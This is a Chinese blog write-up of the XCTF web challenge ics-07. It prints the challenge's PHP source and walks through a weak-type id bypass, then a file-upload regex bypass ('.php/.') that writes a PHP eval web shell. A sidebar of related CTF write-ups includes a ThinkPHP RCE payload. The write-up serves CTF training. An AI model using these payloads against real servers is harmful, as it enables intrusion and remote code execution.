XCTF-Web高手进阶区 ics-07

最新推荐文章于 2022-08-23 03:32:40 发布
最新推荐文章于 2022-08-23 03:32:40 发布
阅读量270 收藏
点赞数 1
分类专栏: 文件上传 PHP弱类型比较 文章标签: php web 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/109339638
版权

WP

进入环境,按照提示进入项目管理页面,点击view-source得到源码:

<?php
session_start();

if (!isset($_GET[page])) {
    show_source(__FILE__);
    die();
}

if (isset($_GET[page]) && $_GET[page] != 'index.php') {
    include('flag.php');
}else {
    header('Location: ?page=flag.php');
}

?>


<?php
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/".$file;

    if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
        die("Bad file extension");
    }else{
        chdir('uploaded');
        $f = fopen($filename, 'w');
        fwrite($f, $con);
        fclose($f);
    }
}
?>

<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
    include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);
    $sql="select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}

if(!$result)die("<br >something wae wrong ! <br>");
if($result){
    echo "id: ".$result->id."</br>";
    echo "name:".$result->user."</br>";
    $_SESSION['admin'] = True;
}
?>

首先是这个点:

if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {


$sql="select * from cetc007.user where id='$id'";

浮点数!==‘1’,而且id最后一位是9,并且传入的id一定要可以查到数据。
我用的是id=1a9,师傅们还有其他的姿势:

  • 1\9
  • 1,9
    接下来就是相当于文件上传了。
    $con是文件的内容,$file是文件名,而且存在正则匹配,最后是php的后缀的都不行。
    因此这里最简单的就是后面加上/.,直接绕过正则匹配:
file=4321.php/.&con=<?php eval($_POST[feng]);?>

需要注意的是,我们文件的目录是在/uploaded/backup/下面。
当然也可以这样:

file=1432.php/1432.php/..&con=<?php eval($_POST[feng]);?>

然后蚁剑直接连就可以了。

bfengj
关注
专栏目录
攻防世界web进阶ics-07
gongjingege的博客
08-14 444
题目描述:工控云管理系统项目管理页面解析漏洞 打开靶机 根据题目描述,点击项目管理 点击view-source可以查看源码 大概有三部分 1, <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') {
攻防世界练习题web
果果的csdn
06-12 1151
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
[wp] 攻防世界 isc-07
MercyLin的博客
09-16 972
首先看源代码里的这一段: if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'config.php'; $id = mysql_real_escape_string($_GET[id]); ...
攻防世界-web-ics-07
mlws1900的博客
08-23 1098
判断session是不是admin,然后获取到一些值(应该就是我们post传上去的),如果匹配到php3457,pht,phtml这种特殊的后缀名,那么就结束。第三段代码是对get参数id进行校验,如果id的浮点数不是1,且最后一位是9那么实行查询语句,如果查询正确,会得到一个admin的session。get通过page传参,不能是index.php,否则包含flag.php,直接重定向到flag.php(就是界面没变)上传成功后,会切换到uploaded目录,创建文件,并将con的内容写入,
XCTFics-07
小白渣的博客
10-28 2301
三种解题方法 (1) 步骤 1.进入题目后,查看源码进行审计,第一步需要进行绕过,获取到admin的session。 2.绕过要注意的三个点为: ​ (1)floatval($ _ GET [id])!==‘1’ //浮点不为1 ​ (2)substr($ _ GET [id],-1)==='9‘ //id最后一位为9 ​ (3)Mysql查询结果限制,id不能过大, 3.构建后exp为http:...
xctf攻防世界 Web高手进阶 ics-07
l8947943的博客
01-01 624
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问题 这个题还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解题的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
攻防世界-web高手进阶
zji
04-25 6534
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 229
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 302
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTF-WEB进阶-PHP2
Lorezon的博客
03-14 161
打开题目发现只有一行字: 既然没什么有用的信息就看看常见的index页面,但是发现依然没有什么有用的信息,查看忽略的phps页面,有了结果: 得到了代码,查看源码进行分析 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($...
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 312
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
XCTF-高手进阶ics-06
1stPeak's Blog
06-13 3192
第一题:ics-06 目标: id爆破 Writeup 发现报表中心有id可以爆破,直接使用burp爆破 数字的id字典可以用python生成,代码: for m in range (100001): print(m) ...
linux系统过滤文件类型,攻防世界-web-ics-07PHP弱类型、linux目录结构特性绕过文件类型过滤)...
weixin_36434967的博客
05-15 184
工控云管理系统项目管理页面解析漏洞。进入题目后,点击进入项目管理页面。点击view-source查看源码。cetc7session_start();if (!isset($_GET[page])) {show_source(__FILE__);die();}if (isset($_GET[page]) && $_GET[page] != 'index.php') {include(...
攻防世界Webics-07
Light_inthe_eyes的博客
10-17 113
打开项目管理页面: 发现有个view-source,点进去有代码,看关键代码: <?php if ($_SESSION['admin']) { $con = $_POST['con']; $file = $_POST['file']; $filename = "backup/".$file; if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){ die(
[极客大挑战 2019]Upload 1
feng的博客
10-22 2767
前言 这真的是一道挺简单的题目,就是进行内容和后缀的绕过,但是我这里出了一点问题。我是用了一个png图片,直接往后面放一句话,之前的做一道文件上传的时候用的挺好的,这题发现不行。不知道是题目过滤了png图片头还是那张图片的问题。 因此去查了查WP,看了一下别的师傅的图片马的头部都是什么样的,然后就过了。 WP 这题的绕过点有三个,一个就是文件内容不能有<?,还有就是文件后缀的绕过,还有图片头。 因此图片内容如下: GIF89a? <script language="php">eval($_
CTFshow-WEB入门-文件上传(持续更新)
feng的博客
01-20 2285
web151 前端检测,抓包改后缀。 web152 直接传 web153 php2, php3, php4, php5, phps, pht, phtm, phtml 经过测试全都不行。因此环境是nginx不是apache,所以.htaccess也不行。访问一下/upload/目录,发现页面存在,经过测试,/upload/index.php存在,因此想到上传.user.ini web154 经过测试,文件里不能有php,而且对后缀进行了过滤,同样利用.user.ini,文件内容的过滤则利用PHP的短标签
[网鼎杯 2020 半决赛]faka
feng的博客
03-22 2273
前言 同样是nepctf,遇到了网鼎杯这题faka的加强版,考虑到实在太菜了,没参加过今年的网鼎杯,所以先去把网鼎杯的faka这题复现一下,源码可以很容易从网上找到。 WP 拿seay审了一下,基本上啥都没审出来啥,就审出来了一个最简单的那个任意读。不过这个任意读还需要登录,因此还需要利用其他的漏洞。 未授权添加账号和提升权限 漏洞代码位于application/admin/controller/Index.php中的info方法: public function info() {
[极客大挑战 2019]BuyFlag 1
feng的博客
10-23 2257
知识点 is_numberic()函数漏洞:is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后。 strcmp()函数漏洞: 如果传入的值,不是字符串的话,会报错,同时使得两个字符串直接相等,返回为零。 一般传入数组或者对象。 PHP弱类型比较:404==‘404xxxxx’ WP 这题主要内容在pay.php。首先You must be a student from CUIT。 通过bp抓包,将cookie改成user=1,完成这个点。
web-ics-05
最新发布
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值